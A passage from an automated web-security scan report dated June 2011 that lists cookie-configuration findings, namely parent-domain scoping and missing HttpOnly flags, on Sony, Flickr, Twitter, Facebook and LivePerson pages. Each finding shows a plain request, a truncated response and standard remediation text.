Confidence:   Certain
Host:   http://www.flickr.com
Path:   /groups/sonycameraclub

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /groups/sonycameraclub HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:43 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=0jlvl41706mcf&b=3&s=ij; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Sun, 22-Jun-2014 15:19:43 GMT; path=/; domain=.flickr.com
X-Served-By: www56.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 82289

<!DOCTYPE html>
<html lang="en-us">
<head>

   <title>Flickr: Sony Camera Club</title>


       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta name="keywords" content="photograph
...[SNIP]...

5.8. http://www.flickr.com/groups/sonycameraclub/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /groups/sonycameraclub/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /groups/sonycameraclub/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:42 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=7i1m6g1706mce&b=3&s=ot; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Sun, 22-Jun-2014 15:19:42 GMT; path=/; domain=.flickr.com
X-Served-By: www108.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 82290

<!DOCTYPE html>
<html lang="en-us">
<head>

   <title>Flickr: Sony Camera Club</title>


       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta name="keywords" content="photograph
...[SNIP]...

6. Cookie without HttpOnly flag set  previous  next
There are 30 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



6.1. http://security.symantec.com/default.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://security.symantec.com
Path:   /default.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /default.asp HTTP/1.1
Host: security.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Thu, 23 Jun 2011 15:19:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: sscv6/default.asp?langid=ie&venid=sym
Content-Length: 162
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACBQSBBB=ECNBPACEOEDIAKNNLHFILIEL; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="sscv6/default.asp?langid=ie&amp;venid=sym">here</a>.</body>

6.2. https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://servicesales.sel.sony.com
Path:   /ecom/accessories/web/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ecom/accessories/web/index.jsp HTTP/1.1
Host: servicesales.sel.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:25 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0001hzt8DTIMlpyDNOhXRLF_ba5:2TPPETS20Q; Path=/
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: TSeca4d8=c2e2e546d60a79171a338a04613adb2bd67db16442c902964e03597d60ac0ec5c9f27c41; Path=/
Content-Length: 46207


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
   <title>Sony Parts and Accessories - Home</title>
   <meta http-equiv="
...[SNIP]...

6.3. http://solutions.liveperson.com/ref/lppb.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://solutions.liveperson.com
Path:   /ref/lppb.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ref/lppb.asp HTTP/1.1
Host: solutions.liveperson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Thu, 23 Jun 2011 15:19:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Location: pbl.asp
Content-Length: 128
Content-Type: text/html
Set-Cookie: visitor=ref=LP+Power+%2D+; expires=Sun, 10-Jan-2010 05:00:00 GMT; domain=.liveperson.com; path=/
Set-Cookie: ASPSESSIONIDQQCBBCCB=EODHGDPDEDEKKABJJNKILEHB; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="pbl.asp">here</a>.</body>

6.4. http://sony.storagesupport.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://sony.storagesupport.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: sony.storagesupport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:26 GMT
Server: Apache/2.2.3 (Linux/SUSE)
X-Powered-By: PHP/5.2.14
Set-Cookie: SESS07abab826d851e77aee85522c6254c88=pjlp1vcvskl9vjmc6g84i02ts4; path=/; domain=.sony.storagesupport.com
Last-Modified: Thu, 23 Jun 2011 12:19:52 GMT
ETag: "d12054ab983693ed6c320fe9a9750c64"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8967

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Sony Storage Support
...[SNIP]...

6.5. http://www.docs.sony.com/reflib/docget.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.docs.sony.com
Path:   /reflib/docget.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reflib/docget.asp HTTP/1.1
Host: www.docs.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 23 Jun 2011 15:09:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 79
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSTSQSCR=PFCCABKBJDOBFNKNEPFEAPOM; path=/
Cache-control: private

<center><font color=red><b>ERROR:</b> Invalid Document Provided</font></center>

6.6. http://www.docs.sony.com/startchat.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.docs.sony.com
Path:   /startchat.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /startchat.asp HTTP/1.1
Host: www.docs.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 23 Jun 2011 15:09:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 6969
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSTSQSCR=FGCCABKBIDKABCNODCECHCGC; path=/
Cache-control: private


<HTML>
   <HEAD>
       <TITLE>Sony eSupport Live Chat Support</TITLE>
       <SCRIPT language="javascript">
       function openTrademarkLink(){window.open('http://products.sel.sony.com/SEL/legal/notice.html','
...[SNIP]...

6.7. http://www.opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:48 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.19 OpenSSL/0.9.8n DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=6il6pfh1t07e7jh9gcmfdeis73; expires=Sat, 16-Jul-2011 18:53:08 GMT; path=/; domain=.opensource.org
Last-Modified: Thu, 23 Jun 2011 15:16:06 GMT
ETag: "73be9325b7928055d2f550e7dc22f698"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

6.8. http://www.sonycreativesoftware.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sonycreativesoftware.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.sonycreativesoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 36816
Content-Type: text/html
X-Powered-By: ASP.NET
Set-Cookie: theme=country=EN&currency=USD&name=DEFAULT&keycode=&lang=ENU; path=/
Set-Cookie: ASPSESSIONIDQQDADTAB=GGCJBNHBDLCBILOMJEKPBHEP; path=/
Date: Thu, 23 Jun 2011 15:19:55 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
   <head>
   <meta http-equiv="content-language" content="en-us"/>
   <title>
...[SNIP]...

6.9. http://sales.liveperson.net/hc/71737897/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/71737897/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/71737897/?&site=71737897&cmd=mTagUrl&lpCallId=447454077424-753562085563&protV=20&lpjson=1&SV%21impression-query-name=chat-sonystyle-sales-general-english&SV%21impression-query-room=chat-sonystyle-sales-general-english&id=4900462531&info=button-impression%3Achat-sonystyle-sales-general-english%28Sony%20Store%20USA%20%7C%20Sony%20VAIO%AE%20Computers%20%7C%20Sony%20Consumer%20Electronics%29&waitForVisitor=true&d=1308841110550&page=http%3A//sales.liveperson.net/hcp/width/img40.gif HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=4916265021794629949; HumanClickSiteContainerID_71737897=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 14:58:30 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Thu, 23 Jun 2011 14:58:31 GMT
Set-Cookie: HumanClickSiteContainerID_71737897=STANDALONE; path=/hc/71737897
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 119

lpConnLib.Process({"ResultSet": {"lpCallId":"447454077424-753562085563","lpCallConfirm":"","lpData":[{"result":80}]}});

6.10. http://sony.tcliveus.com/i  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sony.tcliveus.com
Path:   /i

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i?siteID=501&ts=1308842184775&location=http%3A%2F%2Fwww.sonystyle.com%2Fwebapp%2Fwcs%2Fstores%2Fservlet%2FStoreCatalogDisplay%3FlangId%3D-1%26storeId%3D10151%26catalogId%3D10551%26XID%3DM%3Asidenav%3Aesupport%26%26pageName%3DSony%2520Store%26g%3Dhttp%253A%2F%2Fwww.sonystyle.com%2Fwebapp%2Fwcs%2Fstores%2Fservlet%2FStoreCatalogDisplay%253FlangId%253D-1%2526storeId%253D10151%2526catalogId%253D10551%2526XID%253DM%253Asidenav%253Aesupport%26v0%3DM%253Asidenav%253Aesupport%26h1%3DSony%2520Store%26c3%3DStoreCatalogDisplay%26c6%3DSony%2520Store_%26c19%3DM%253Asidenav%253Aesupport%26v19%3DM%253Asidenav%253Aesupport%26v22%3DM%253Asidenav%253Aesupport%26v23%3DUnited%2520States%2520English%26c27%3DSony%2520Store%2520-%2520Control%26v27%3DSony%2520Store%2520-%2520Control%26v42%3DOther%26v43%3DOther%26v44%3DOther&tagv=5.3&tz=-300&r=empty&title=Sony%20Store%20USA%20%7C%20Sony%20VAIO%C2%AE%20Computers%20%7C%20Sony%20Consumer%20Electronics&cd=32&ah=1156&aw=1920&sh=1200&sw=1920&pd=32 HTTP/1.1
Host: sony.tcliveus.com
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&XID=M:sidenav:esupport
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TCID=0007b036-7b3b-8256-99e6-bc8d00000050; NSC_Tpo`=445b326b7863

Response

HTTP/1.1 200 OK
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://www.touchclarity.com/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIa PSAa PSDa OUR STP UNI PUR COM NAV INT STA PRE"
Connection: Keep-Alive
Content-Length: 43
Last-Modified: Thu, 23 Jun 2011 15:16:26 GMT
Content-Type: image/gif
Date: Thu, 23 Jun 2011 15:16:26 GMT
Set-Cookie: NSC_Tpo`=445b326b7863;expires=Thu, 23-Jun-11 19:16:25 GMT;path=/

GIF89a.............!.......,............Q.;

6.11. http://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sonyelectronicssupportus.112.2o7.net
Path:   /b/ss/esupport-sony-dev/1/H.10--NS/0

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/esupport-sony-dev/1/H.10--NS/0 HTTP/1.1
Host: sonyelectronicssupportus.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 23 Jun 2011 15:19:26 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tbdaax7Ecex3Cbx7Ex7Fhx3Cutg=[CS]v4|0-0|4E03597E[CE]; Expires=Tue, 21 Jun 2016 15:19:26 GMT; Domain=.2o7.net; Path=/
Location: http://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 22 Jun 2011 15:19:26 GMT
Last-Modified: Fri, 24 Jun 2011 15:19:26 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www495
Content-Length: 0
Content-Type: text/plain
Connection: close


6.12. https://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sonyelectronicssupportus.112.2o7.net
Path:   /b/ss/esupport-sony-dev/1/H.10--NS/0

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/esupport-sony-dev/1/H.10--NS/0 HTTP/1.1
Host: sonyelectronicssupportus.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 23 Jun 2011 15:19:27 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tbdaax7Ecex3Cbx7Ex7Fhx3Cutg=[CS]v4|0-0|4E03597F[CE]; Expires=Tue, 21 Jun 2016 15:19:27 GMT; Domain=.2o7.net; Path=/
Location: https://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 22 Jun 2011 15:19:27 GMT
Last-Modified: Fri, 24 Jun 2011 15:19:27 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www495
Content-Length: 0
Content-Type: text/plain
Connection: close


6.13. https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sonysscom.112.2o7.net
Path:   /b/ss/sonysscom/1/H.8--NS/0

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/sonysscom/1/H.8--NS/0 HTTP/1.1
Host: sonysscom.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 23 Jun 2011 15:19:28 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_zfgpzzjfd=[CS]v4|0-0|4E035980[CE]; Expires=Tue, 21 Jun 2016 15:19:28 GMT; Domain=.2o7.net; Path=/
Location: https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 22 Jun 2011 15:19:28 GMT
Last-Modified: Fri, 24 Jun 2011 15:19:28 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www430
Content-Length: 0
Content-Type: text/plain
Connection: close


6.14. http://twitter.com/sonyoutletusa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /sonyoutletusa

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sonyoutletusa HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:33 GMT
Server: hi
Status: 200 OK
X-Transaction: 1308842373-2439-32037
ETag: "face9414ffcb37b56c235fd4a36ddf88"
X-Frame-Options: SAMEORIGIN
Last-Modified: Thu, 23 Jun 2011 15:19:33 GMT
X-Runtime: 0.00853
Content-Type: text/html; charset=utf-8
Content-Length: 19872
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 2a867da6018348b9ab53639033d7a20fdada72a0
Set-Cookie: k=173.193.214.243.1308842373290278; path=/; expires=Thu, 30-Jun-11 15:19:33 GMT; domain=.twitter.com
Set-Cookie: guest_id=130884237329990406; path=/; expires=Sat, 23 Jul 2011 15:19:33 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCLWwFb0wAToHaWQiJTJhY2JhYzVmNTU0YjJj%250AYmZhNWMyNDRmNDVkODk5OGIwIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--8c7fe27671279233551b5c47933be7b27d397a15; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

6.15. http://us.playstation.com/psn/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.playstation.com
Path:   /psn/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /psn/ HTTP/1.1
Host: us.playstation.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:34 GMT
Server: Apache
Last-Modified: Wed, 08 Jun 2011 20:21:19 GMT
ETag: "b2058a-f02f-4a539144aadc0"
Accept-Ranges: bytes
Content-Length: 61487
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Set-Cookie: SONYCOOKIE1=2741283008.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">    <head><meta http-equi
...[SNIP]...

6.16. http://www.facebook.com/sonyelectronics  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sonyelectronics

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sonyelectronics HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=jVkDTsgSBkZEpRPRjIw6e36G; expires=Sat, 22-Jun-2013 15:19:41 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=rLE1G; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsonyelectronics; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsonyelectronics; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.171.37
Connection: close
Date: Thu, 23 Jun 2011 15:19:41 GMT
Content-Length: 169018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema
...[SNIP]...

6.17. http://www.flickr.com/groups/sonycameraclub  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /groups/sonycameraclub

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /groups/sonycameraclub HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:43 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=0jlvl41706mcf&b=3&s=ij; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Sun, 22-Jun-2014 15:19:43 GMT; path=/; domain=.flickr.com
X-Served-By: www56.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 82289

<!DOCTYPE html>
<html lang="en-us">
<head>

   <title>Flickr: Sony Camera Club</title>


       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta name="keywords" content="photograph
...[SNIP]...

6.18. http://www.flickr.com/groups/sonycameraclub/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /groups/sonycameraclub/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /groups/sonycameraclub/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
